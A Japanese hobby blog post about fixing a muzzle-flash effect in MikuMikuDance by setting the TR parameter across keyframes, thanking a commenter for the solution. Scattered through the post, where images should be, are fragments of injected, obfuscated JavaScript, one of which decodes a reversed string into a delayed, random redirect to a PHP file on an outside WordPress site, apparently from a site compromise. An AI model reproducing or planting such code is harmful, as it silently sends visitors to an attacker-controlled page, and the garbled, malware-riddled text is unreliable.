【MMD】銃を撃つシーンのエフェクトをどうしよう その3(解決)

昨日の投稿記事でマズルフラッシュの単発用がうまく動かないと書きました。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html” title=”【MMD】銃を撃つシーンのエフェクトをどうしよう その2”>【MMD】銃を撃つシーンのエフェクトをどうしよう その2

別のところで、ビームマンPからコメントを頂き解決しました。
ビームマンPありがとうございます!!

原因は、実は動いてましたというオチが正しいのかな。
ようは、使い方を理解できてなかったということです。

エフェクトの効果はTRで設定するとリードミーにも書いてあったけど理解できませんでした。

効果をわかりやすく理解するために、まず、TRを1.0で登録
そして、フレームを進めたところにTRを0.0で登録。
こうすることで、キーフレームの間で1.0から0.0まで徐々に少なくなってきます。


TRが1.0の状態のフレームだと以下の画像のように何もエフェクトがあらわれません。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} 上図:TR=1.00


フレームをちょっと先にすると、発射のエフェクトが出ました。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} 上図:TR=0.98


さらにフレームを進めると、だんだんと発射エフェクトが収束してきます。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} 上図:TR=0.84


というような感じに、1.0にしたり、0.0にしてエフェクトを確認してもなにも表示されないということです。
そして、0.5でも、なにも表示されないみたいです。

ということで、私がテストでいれた数値は全部、エフェクトが表示されない値だったようです。
もし、マズルフラッシュを使おうとして、私と同じような勘違いしたかたに役立てば・・・
って、いないですかね。

なんにせよ、これで銃と銃のエフェクトはばっちりです!!

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